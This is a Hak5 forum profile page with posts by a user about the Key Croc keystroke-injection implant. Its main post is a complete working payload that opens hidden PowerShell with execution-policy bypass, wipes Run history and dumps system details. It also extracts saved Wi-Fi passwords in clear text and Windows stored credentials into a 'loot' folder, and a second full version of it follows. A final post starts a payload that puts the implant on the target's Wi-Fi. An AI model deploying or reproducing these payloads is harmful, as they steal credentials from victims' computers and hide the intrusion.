spywill

Active Members
  • Content Count: 81
  • Days Won: 2

About spywill
  • Rank: Hak5 Fan ++

Profile Information
  • Gender: Male
  • Interests: Programming\networking

Recent Profile Visitors
445 profile views
  1. The keycroc was not designed for a laptop, more for a desktop, so you can hide it. Yes, you need a keyboard plugged in to the keycroc. I have not tested this yet, but if you get your keycroc online and then ssh into it, you may be able to run payloads without a keyboard, or run them from Cloud C2.
  2. This is just my opinion: get them both, they are great working gear. It all depends what you want to do with them, and for payloads, make them yourself for what you want them to do. Hope this helps.
  3. This is a bash bunny payload from https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber converted to a keycroc payload. The payload is working on the keycroc; just place all three files into the payloads folder on the keycroc and then type pcinfo, and all the loot will be saved to the loot/info folder on the keycroc.

Files: info.ps1, payload.txt, run.ps1

payload.txt:

MATCH pcinfo
QUACK LOCK
# --> udisk unmount
ATTACKMODE HID STORAGE
QUACK DELAY 5000
QUACK GUI d
QUACK GUI r
QUACK DELAY 500
QUACK STRING "powershell -nop -ex Bypass -w Hidden"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING ".((gwmi win32_volume -f 'label=''KeyCroc''').Name+'payloads\run.ps1')"
QUACK ENTER

run.ps1:

#Remove run history
powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"

#Get the path and file name that you are using for output
# find connected KeyCroc drive:
$VolumeName = "KeyCroc"
$computerSystem = Get-CimInstance CIM_ComputerSystem
$backupDrive = $null
Get-WmiObject win32_logicaldisk | % {
    if ($_.VolumeName -eq $VolumeName) {
        $backupDrive = $_.DeviceID
    }
}

#See if a loot folder exist in usb. If not create one
$TARGETDIR = $backupDrive + "\loot"
if(!(Test-Path -Path $TARGETDIR )){
    New-Item -ItemType directory -Path $TARGETDIR
}

#See if a info folder exist in loot folder. If not create one
$TARGETDIR = $backupDrive + "\loot\info"
if(!(Test-Path -Path $TARGETDIR )){
    New-Item -ItemType directory -Path $TARGETDIR
}

#Create a path that will be used to make the file
$datetime = get-date -f yyyy-MM-dd_HH-mm
$backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt"

#Create output from info script
$TARGETDIR = $MyInvocation.MyCommand.Path
$TARGETDIR = $TARGETDIR -replace ".......$"
cd $TARGETDIR
PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath

info.ps1:

# Shows details of currently running PC
# Simen Kjeserud (Original creator), Gachnang, DannyK999 (Version 2.0)

#Get info about pc
# Get IP / Nework Info
try {
    $computerPubIP = (Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content
} catch {
    $computerPubIP = "Error getting Public IP"
}
$computerIP = Get-WmiObject Win32_NetworkAdapterConfiguration|Where {$_.Ipaddress.length -gt 1}

$IsDHCPEnabled = $False
$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=$True" | ? {$_.IPEnabled}
foreach ($Network in $Networks) {
    If($network.DHCPEnabled) {
        $IsDHCPEnabled = $True
    }
    [string[]]$computerMAC = $Network.MACAddress
}

#Get System Info
$computerSystem = Get-CimInstance CIM_ComputerSystem
$computerBIOS = Get-CimInstance CIM_BIOSElement
$computerOs = Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name="InstallDate";Expression={([WMI]'').ConvertToDateTime($_.InstallDate)}} , @{Name="LastBootUpTime";Expression={([WMI]'').ConvertToDateTime($_.LastBootUpTime)}}, @{Name="LocalDateTime";Expression={([WMI]'').ConvertToDateTime($_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory | Format-List
$computerCpu = Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List
$computerMainboard = Get-WmiObject Win32_BaseBoard | Format-List
$computerRamCapacity = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { "{0:N1} GB" -f ($_.sum / 1GB)}
$computerRam = Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name="Capacity";Expression={ "{0:N1} GB" -f ($_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table

# Get HDDs
$driveType = @{
    2="Removable disk "
    3="Fixed local disk "
    4="Network disk "
    5="Compact disk "}
$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name="DriveType";Expression={$driveType.item([int]$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name="Size_GB";Expression={"{0:N1} GB" -f ($_.Size / 1Gb)}}, @{Name="FreeSpace_GB";Expression={"{0:N1} GB" -f ($_.FreeSpace / 1Gb)}}, @{Name="FreeSpace_percent";Expression={"{0:N1}%" -f ((100 / ($_.Size / $_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber,@{ Name="Size GB"; Expression={$_.Size_GB}; align="right"; }, @{ Name="FreeSpace GB"; Expression={$_.FreeSpace_GB}; align="right"; }, @{ Name="FreeSpace %"; Expression={$_.FreeSpace_percent}; align="right"; }

#Get - Com & Serial Devices
$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi]($_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table

# Check RDP
$RDP
if ((Get-ItemProperty "hklm:\System\CurrentControlSet\Control\Terminal Server").fDenyTSConnections -eq 0) {
    $RDP = "RDP is Enabled"
} else {
    $RDP = "RDP is NOT Enabled"
}

# Get Network Interfaces
$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress

# Get wifi SSIDs and Passwords
$WLANProfileNames = @()
#Get all the WLAN profile names
$Output = netsh.exe wlan show profiles | Select-String -pattern ":"
#Trim the output to receive only the name
Foreach($WLANProfileName in $Output){
    $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim()
}
$WLANProfileObjects = @()
#Bind the WLAN profile names and also the password to a custom object
Foreach($WLANProfileName in $WLANProfileNames){
    #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
    try{
        $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim()
    } Catch {
        $WLANProfilePassword = "The password is not stored in this profile"
    }
    #Build the object and add this to an array
    $WLANProfileObject = New-Object PSCustomobject
    $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName
    $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword
    $WLANProfileObjects += $WLANProfileObject
    Remove-Variable WLANProfileObject
}

# local-user
$luser = Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID

# process first
$process = Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine

# Get Listeners / ActiveTcpConnections
$listener = Get-NetTCPConnection | select @{Name="LocalAddress";Expression={$_.LocalAddress + ":" + $_.LocalPort}}, @{Name="RemoteAddress";Expression={$_.RemoteAddress + ":" + $_.RemotePort}}, State, AppliedSetting, OwningProcess
$listener = $listener | foreach-object {
    $listenerItem = $_
    $processItem = ($process | where { [int]$_.Handle -like [int]$listenerItem.OwningProcess })
    new-object PSObject -property @{
        "LocalAddress" = $listenerItem.LocalAddress
        "RemoteAddress" = $listenerItem.RemoteAddress
        "State" = $listenerItem.State
        "AppliedSetting" = $listenerItem.AppliedSetting
        "OwningProcess" = $listenerItem.OwningProcess
        "ProcessName" = $processItem.ProcessName
    }
} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table

# process last
$process = $process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine

# service
$service = Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name="Sort";Expression={$_.State + $_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName

# installed software (get uninstaller)
$software = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { $_.DisplayName -notlike $null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize

# drivers
$drivers = Get-WmiObject Win32_PnPSignedDriver| where { $_.DeviceName -notlike $null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion

# videocard
$videocard = Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution

#Get stored passwords
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault = $vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

#The output
Clear-Host
Write-Host
$computerSystem.Name
"=================================================================="
"Manufacturer: " + $computerSystem.Manufacturer
"Model: " + $computerSystem.Model
"Serial Number: " + $computerBIOS.SerialNumber
""
""
""
"OS:"
"=================================================================="+ ($computerOs | out-string)
"CPU:"
"=================================================================="+ ($computerCpu | out-string)
"RAM:"
"=================================================================="
"Capacity: " + $computerRamCapacity+ ($computerRam | out-string)
"Mainboard:"
"=================================================================="+ ($computerMainboard | out-string)
"Bios:"
"=================================================================="+ (Get-WmiObject win32_bios | out-string)
"Local-user:"
"=================================================================="+ ($luser | out-string)
"HDDs:"
"=================================================================="+ ($Hdds | out-string)
"COM & SERIAL DEVICES:"
"=================================================================="+ ($COMDevices | Out-String)
"Network:"
"=================================================================="
"Computers MAC address: " + $computerMAC
"Computers IP address: " + $computerIP.ipaddress[0]
"Public IP address: " + $computerPubIP
"RDP: " + $RDP
""
($Network | out-string)
"W-Lan profiles:"
"=================================================================="+ ($WLANProfileObjects | out-string)
"listeners / ActiveTcpConnections:"
"=================================================================="+ ($listener | out-string)
"Current running process:"
"=================================================================="+ ($process | out-string)
"Services:"
"=================================================================="+ ($service | out-string)
"Installed software:"
"=================================================================="+ ($software | out-string)
"Installed drivers:"
"=================================================================="+ ($drivers | out-string)
"Installed videocards:"
"=================================================================="+ ($videocard | out-string)
"Windows/user passwords:"
"=================================================================="
$vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize

Remove-Variable -Name computerPubIP, computerIP,IsDHCPEnabled,Network,Networks, computerMAC,computerSystem,computerBIOS,computerOs, computerCpu, computerMainboard,computerRamCapacity, computerRam,driveType,Hdds,RDP,WLANProfileNames,WLANProfileName, Output,WLANProfileObjects,WLANProfilePassword,WLANProfileObject,luser, process,listener,listenerItem,process,service,software,drivers,videocard, vault -ErrorAction SilentlyContinue -Force

This was my first attempt; it does not save to the loot folder:

MATCH pcinfo
# --> udisk unmount
ATTACKMODE HID STORAGE
QUACK DELAY 5000
QUACK GUI d
QUACK GUI r
QUACK DELAY 1000
QUACK STRING powershell
QUACK ENTER
QUACK DELAY 1000
# --> Remove run history
QUACK STRING "\"Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue\""
QUACK ENTER
QUACK DELAY 1000
# --> Get the path and file name that you are using for output
# --> find connected KeyCroc drive:
QUACK STRING "\$VolumeName = \"KeyCroc\""
QUACK ENTER
QUACK STRING "\$computerSystem = Get-CimInstance CIM_ComputerSystem"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "\$backupDrive = \$null"
QUACK ENTER
QUACK STRING "get-wmiobject win32_logicaldisk | % {"
QUACK ENTER
QUACK STRING "if (\$_.VolumeName -eq \$VolumeName) {"
QUACK ENTER
QUACK STRING "\$backupDrive = \$_.DeviceID"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
# --> See if a loot folder exist in keycroc. If not create one
QUACK STRING "\$TARGETDIR = \$backupDrive + \"\loot\""
QUACK ENTER
QUACK STRING "if(!(Test-Path -Path \$TARGETDIR )){"
QUACK ENTER
QUACK STRING "New-Item -ItemType directory -Path \$TARGETDIR"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK DELAY 1000
# --> See if a info folder exist in loot folder. If not create one
QUACK STRING "\$TARGETDIR = \$backupDrive + \"\loot\info\""
QUACK ENTER
QUACK STRING "if(!(Test-Path -Path \$TARGETDIR )){"
QUACK ENTER
QUACK STRING "New-Item -ItemType directory -Path \$TARGETDIR"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK DELAY 1000
# --> Create a path that will be used to make the file
QUACK STRING "\$datetime = get-date -f yyyy-MM-dd_HH-mm"
QUACK ENTER
QUACK STRING "\$backupPath = \$backupDrive + \"\loot\info\" + \$computerSystem.Name + \" - \" + \$datetime + \".txt\""
QUACK ENTER
QUACK DELAY 1000
# --> Create output from info script
QUACK STRING "\$TARGETDIR = \$MyInvocation.MyCommand.Path"
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "\$TARGETDIR = \$TARGETDIR -replace \".......\$\""
QUACK ENTER
QUACK DELAY 1000
QUACK STRING "cd \$TARGETDIR"
QUACK ENTER
#QUACK STRING "PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > \$backupPath"
QUACK ENTER
QUACK DELAY 1000
# --> Shows details of currently running PC
# --> Get info about pc
# --> Get IP / Nework Info
QUACK DELAY 1000
QUACK STRING "try"
QUACK ENTER
QUACK STRING "{"
QUACK ENTER
QUACK STRING "\$computerPubIP = (Invoke-WebRequest ipinfo.io/ip -UseBasicParsing).Content"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "catch"
QUACK ENTER
QUACK STRING "{"
QUACK ENTER
QUACK STRING "\$computerPubIP = \"Error getting Public IP\""
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "\$computerIP = Get-WmiObject Win32_NetworkAdapterConfiguration|Where {\$_.Ipaddress.length -gt 1}"
QUACK ENTER
QUACK STRING "\$IsDHCPEnabled = \$False"
QUACK ENTER
QUACK STRING "\$Networks = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter \"DHCPEnabled=\$True\" | ? {\$_.IPEnabled}"
QUACK ENTER
QUACK STRING "foreach (\$Network in \$Networks) {"
QUACK ENTER
QUACK STRING "If(\$network.DHCPEnabled) {"
QUACK ENTER
QUACK STRING "\$IsDHCPEnabled = \$True"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "[string[]]\$computerMAC = \$Network.MACAddress"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
# --> Get System Info
QUACK DELAY 1000
QUACK STRING "\$computerSystem = Get-CimInstance CIM_ComputerSystem"
QUACK ENTER
QUACK STRING "\$computerBIOS = Get-CimInstance CIM_BIOSElement"
QUACK ENTER
QUACK STRING "\$computerOs = Get-WmiObject win32_operatingsystem | select Caption, CSName, Version, @{Name=\"InstallDate\";Expression={([WMI]'').ConvertToDateTime(\$_.InstallDate)}} , @{Name=\"LastBootUpTime\";Expression={([WMI]'').ConvertToDateTime(\$_.LastBootUpTime)}}, @{Name=\"LocalDateTime\";Expression={([WMI]'').ConvertToDateTime(\$_.LocalDateTime)}}, CurrentTimeZone, CountryCode, OSLanguage, SerialNumber, WindowsDirectory | Format-List"
QUACK ENTER
QUACK STRING "\$computerCpu = Get-WmiObject Win32_Processor | select DeviceID, Name, Caption, Manufacturer, MaxClockSpeed, L2CacheSize, L2CacheSpeed, L3CacheSize, L3CacheSpeed | Format-List"
QUACK ENTER
QUACK STRING "\$computerMainboard = Get-WmiObject Win32_BaseBoard | Format-List"
QUACK ENTER
QUACK STRING "\$computerRamCapacity = Get-WmiObject Win32_PhysicalMemory | Measure-Object -Property capacity -Sum | % { \"{0:N1} GB\" -f (\$_.sum / 1GB)}"
QUACK ENTER
QUACK STRING "\$computerRam = Get-WmiObject Win32_PhysicalMemory | select DeviceLocator, @{Name=\"Capacity\";Expression={ \"{0:N1} GB\" -f (\$_.Capacity / 1GB)}}, ConfiguredClockSpeed, ConfiguredVoltage | Format-Table"
QUACK ENTER
# --> Get HDDs
QUACK DELAY 1000
QUACK STRING "\$driveType = @{"
QUACK ENTER
QUACK STRING "2=\"Removable disk\""
QUACK ENTER
QUACK STRING "3=\"Fixed local disk\""
QUACK ENTER
QUACK STRING "4=\"Network disk\""
QUACK ENTER
QUACK STRING "5=\"Compact disk\"}"
QUACK ENTER
QUACK STRING "\$Hdds = Get-WmiObject Win32_LogicalDisk | select DeviceID, VolumeName, @{Name=\"DriveType\";Expression={\$driveType.item([int]\$_.DriveType)}}, FileSystem,VolumeSerialNumber,@{Name=\"Size_GB\";Expression={\"{0:N1} GB\" -f (\$_.Size / 1Gb)}}, @{Name=\"FreeSpace_GB\";Expression={\"{0:N1} GB\" -f (\$_.FreeSpace / 1Gb)}}, @{Name=\"FreeSpace_percent\";Expression={\"{0:N1}%\" -f ((100 / (\$_.Size / \$_.FreeSpace)))}} | Format-Table DeviceID, VolumeName,DriveType,FileSystem,VolumeSerialNumber, @{ Name=\"Size GB\"; Expression={\$_.Size_GB}; align=\"right\"; }, @{ Name=\"FreeSpace GB\"; Expression={\$_.FreeSpace_GB}; align=\"right\"; }, @{ Name=\"FreeSpace %\"; Expression={\$_.FreeSpace_percent}; align=\"right\"; }"
QUACK ENTER
# --> Get - Com & Serial Devices
QUACK DELAY 1000
QUACK STRING "\$COMDevices = Get-Wmiobject Win32_USBControllerDevice | ForEach-Object{[Wmi](\$_.Dependent)} | Select-Object Name, DeviceID, Manufacturer | Sort-Object -Descending Name | Format-Table"
QUACK ENTER
# --> Check RDP
QUACK STRING "\$RDP"
QUACK DELAY 1000
QUACK ENTER
QUACK STRING "if ((Get-ItemProperty \"hklm:\System\CurrentControlSet\Control\Terminal Server\").fDenyTSConnections -eq 0) {"
QUACK ENTER
QUACK STRING "\$RDP = \"RDP is Enabled\""
QUACK ENTER
QUACK STRING "} else {"
QUACK ENTER
QUACK STRING "\$RDP = \"RDP is NOT Enabled\""
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
# --> Get Network Interfaces
QUACK DELAY 1000
QUACK STRING "\$Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { \$_.MACAddress -notlike \$null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress"
QUACK ENTER
# --> Get wifi SSIDs and Passwords
QUACK DELAY 1000
QUACK STRING "\$WLANProfileNames = @()"
QUACK ENTER
# --> Get all the WLAN profile names
QUACK DELAY 1000
QUACK STRING "\$Output = netsh.exe wlan show profiles | Select-String -pattern \":\""
QUACK ENTER
# --> Trim the output to receive only the name
QUACK DELAY 1000
QUACK STRING "Foreach(\$WLANProfileName in \$Output){"
QUACK ENTER
QUACK STRING "\$WLANProfileNames += ((\$WLANProfileName -split \":\")[1]).Trim()"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "\$WLANProfileObjects = @()"
QUACK ENTER
# --> Bind the WLAN profile names and also the password to a custom object
QUACK DELAY 1000
QUACK STRING "Foreach(\$WLANProfileName in \$WLANProfileNames){"
QUACK ENTER
# --> get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user
QUACK DELAY 1000
QUACK STRING "try"
QUACK ENTER
QUACK STRING "{"
QUACK ENTER
QUACK STRING "\$WLANProfilePassword = (((netsh.exe wlan show profiles name=\"\$WLANProfileName\" key=clear | select-string -Pattern \"Key Content\") -split \":\")[1]).Trim()"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "Catch"
QUACK ENTER
QUACK STRING "{"
QUACK ENTER
QUACK STRING "\$WLANProfilePassword = \"The password is not stored in this profile\""
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK DELAY 2000
# --> Build the object and add this to an array
QUACK STRING "\$WLANProfileObject = New-Object PSCustomobject"
QUACK ENTER
QUACK STRING "\$WLANProfileObject | Add-Member -Type NoteProperty -Name \"ProfileName\" -Value \$WLANProfileName"
QUACK ENTER
QUACK STRING "\$WLANProfileObject | Add-Member -Type NoteProperty -Name \"ProfilePassword\" -Value \$WLANProfilePassword"
QUACK ENTER
QUACK STRING "\$WLANProfileObjects += \$WLANProfileObject"
QUACK ENTER
QUACK STRING "Remove-Variable WLANProfileObject"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
# --> local-user
QUACK DELAY 1000
QUACK STRING "\$luser = Get-WmiObject -Class Win32_UserAccount | Format-Table Caption, Domain, Name, FullName, SID"
QUACK ENTER
# --> process first
QUACK DELAY 1000
QUACK STRING "\$process = Get-WmiObject win32_process | select Handle, ProcessName, ExecutablePath, CommandLine"
QUACK ENTER
# --> Get Listeners / ActiveTcpConnections
QUACK DELAY 1000
QUACK STRING "\$listener = Get-NetTCPConnection | select @{Name=\"LocalAddress\";Expression={\$_.LocalAddress + \":\" + \$_.LocalPort}}, @{Name=\"RemoteAddress\";Expression={\$_.RemoteAddress + \":\" + \$_.RemotePort}}, State, AppliedSetting, OwningProcess"
QUACK ENTER
QUACK STRING "\$listener = \$listener | foreach-object {"
QUACK ENTER
QUACK STRING "\$listenerItem = \$_"
QUACK ENTER
QUACK STRING "\$processItem = (\$process | where { [int]\$_.Handle -like [int]\$listenerItem.OwningProcess })"
QUACK ENTER
QUACK STRING "new-object PSObject -property @{"
QUACK ENTER
QUACK STRING "\"LocalAddress\" = \$listenerItem.LocalAddress"
QUACK ENTER
QUACK STRING "\"RemoteAddress\" = \$listenerItem.RemoteAddress"
QUACK ENTER
QUACK STRING "\"State\" = \$listenerItem.State"
QUACK ENTER
QUACK STRING "\"AppliedSetting\" = \$listenerItem.AppliedSetting"
QUACK ENTER
QUACK STRING "\"OwningProcess\" = \$listenerItem.OwningProcess"
QUACK ENTER
QUACK STRING "\"ProcessName\" = \$processItem.ProcessName"
QUACK ENTER
QUACK STRING "}"
QUACK ENTER
QUACK STRING "} | select LocalAddress, RemoteAddress, State, AppliedSetting, OwningProcess, ProcessName | Sort-Object LocalAddress | Format-Table"
QUACK ENTER
# --> process last
QUACK DELAY 1000
QUACK STRING "\$process = \$process | Sort-Object ProcessName | Format-Table Handle, ProcessName, ExecutablePath, CommandLine"
QUACK ENTER
# --> service
QUACK DELAY 1000
QUACK STRING "\$service = Get-WmiObject win32_service | select State, Name, DisplayName, PathName, @{Name=\"Sort\";Expression={\$_.State + \$_.Name}} | Sort-Object Sort | Format-Table State, Name, DisplayName, PathName"
QUACK ENTER
# --> installed software (get uninstaller)
QUACK DELAY 1000
QUACK STRING "\$software = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | where { \$_.DisplayName -notlike \$null } | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Sort-Object DisplayName | Format-Table -AutoSize"
QUACK ENTER
# --> drivers
QUACK DELAY 1000
QUACK STRING "\$drivers = Get-WmiObject Win32_PnPSignedDriver | where { \$_.DeviceName -notlike \$null } | select DeviceName, FriendlyName, DriverProviderName, DriverVersion"
QUACK ENTER
# --> videocard
QUACK DELAY 1000
QUACK STRING "\$videocard = Get-WmiObject Win32_VideoController | Format-Table Name, VideoProcessor, DriverVersion, CurrentHorizontalResolution, CurrentVerticalResolution"
QUACK ENTER
# --> Get stored passwords
QUACK DELAY 1000
QUACK STRING "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]"
QUACK ENTER
QUACK STRING "\$vault = New-Object Windows.Security.Credentials.PasswordVault"
QUACK ENTER
QUACK STRING "\$vault = \$vault.RetrieveAll() | % { \$_.RetrievePassword();\$_ }"
QUACK ENTER
# --> The output
QUACK DELAY 2000
QUACK STRING "Clear-Host"
QUACK ENTER
QUACK STRING "Write-Host"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\$computerSystem.Name"
QUACK ENTER
QUACK STRING "\"==================================================================\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Manufacturer: \" + \$computerSystem.Manufacturer"
QUACK ENTER
QUACK STRING "\"Model: \" + \$computerSystem.Model"
QUACK ENTER
QUACK STRING "\"Serial Number: \" + \$computerBIOS.SerialNumber"
QUACK ENTER
QUACK STRING "\"\""
QUACK ENTER
QUACK STRING "\"\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"\""
QUACK ENTER
QUACK STRING "\"OS:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$computerOs | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK ENTER
QUACK STRING "\"CPU:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$computerCpu | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"RAM:\""
QUACK ENTER
QUACK STRING "\"==================================================================\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Capacity: \" + \$computerRamCapacity+ (\$computerRam | out-string)"
QUACK ENTER
QUACK STRING "\"Mainboard:\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"==================================================================\"+ (\$computerMainboard | out-string)"
QUACK ENTER
QUACK STRING "\"Bios:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (Get-WmiObject win32_bios | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Local-user:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$luser | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"HDDs:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$Hdds | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"COM & SERIAL DEVICES:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$COMDevices | Out-String)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Network:\""
QUACK ENTER
QUACK STRING "\"==================================================================\""
QUACK ENTER
QUACK STRING "\"Computers MAC address: \" + \$computerMAC"
QUACK ENTER
QUACK STRING "\"Computers IP address: \" + \$computerIP.ipaddress[0]"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Public IP address: \" + \$computerPubIP"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"RDP: \" + \$RDP"
QUACK ENTER
QUACK STRING "\"\""
QUACK ENTER
QUACK STRING "(\$Network | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"W-Lan profiles:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$WLANProfileObjects | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"listeners / ActiveTcpConnections:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$listener | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Current running process:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$process | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Services:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$service | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Installed software:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$software | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Installed drivers:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$drivers | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Installed videocards:\""
QUACK ENTER
QUACK STRING "\"==================================================================\"+ (\$videocard | out-string)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "\"Windows/user passwords:\""
QUACK ENTER
QUACK STRING "\"==================================================================\""
QUACK ENTER
QUACK STRING "\$vault | select Resource, UserName, Password | Sort-Object Resource | ft -AutoSize"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "Remove-Variable -Name computerPubIP,"
QUACK ENTER
QUACK STRING "computerIP,IsDHCPEnabled,Network,Networks,"
QUACK ENTER
QUACK STRING "computerMAC,computerSystem,computerBIOS,computerOs,"
QUACK ENTER
QUACK STRING "computerCpu, computerMainboard,computerRamCapacity,"
QUACK ENTER
QUACK STRING "computerRam,driveType,Hdds,RDP,WLANProfileNames,WLANProfileName,"
QUACK ENTER
QUACK STRING "Output,WLANProfileObjects,WLANProfilePassword,WLANProfileObject,luser,"
QUACK ENTER
QUACK STRING "process,listener,listenerItem,process,service,software,drivers,videocard,"
QUACK ENTER
QUACK STRING "vault -ErrorAction SilentlyContinue -Force"
QUACK ENTER
#ATTACKMODE HID
QUACK DELAY 5000
  4. Windows Get online

Key Croc can get online automatically to the target pc's wifi or to your own wifi.
- After the payload is done running you will have to unplug and plug back in the Key Croc, or wait until the pc reboots.
- You may have to delete the config.txt file off your Key Croc first for the payload to work properly; the Key Croc will create a new config.txt automatically.
- Keep in mind that the Key Croc can be seen on the target network it is connected to, so if anyone does a network scan or any type of network monitoring they will see the Key Croc.

BACKUP YOUR config.txt from your keycroc first before running this.
Edit the delays to make it faster.

- update: removed some extra lines and some minor changes
- powershell running in background now
- No .txt files will be saved to the target pc now, all to the loot folder

getonline.txt:

# Title: Windows Get online
# Description: Get online automatically to target pc wifi or to your own wifi
# Author: spywill
# Version: 1.3
# Category: Key Croc
# Props: Darren Kitchen, RootJunky, Cribbit, Lodrix
#
#
MATCH getonline
QUACK LOCK
# --> udisk unmount
ATTACKMODE HID STORAGE
QUACK DELAY 5000
# --> Close all windows(add more QUACK DELETE if you think more window are open)
QUACK CONTROL-ALT-TAB
QUACK DELETE
QUACK DELETE
QUACK DELETE
QUACK DELAY 500
# --> Minimize all windows
QUACK GUI d
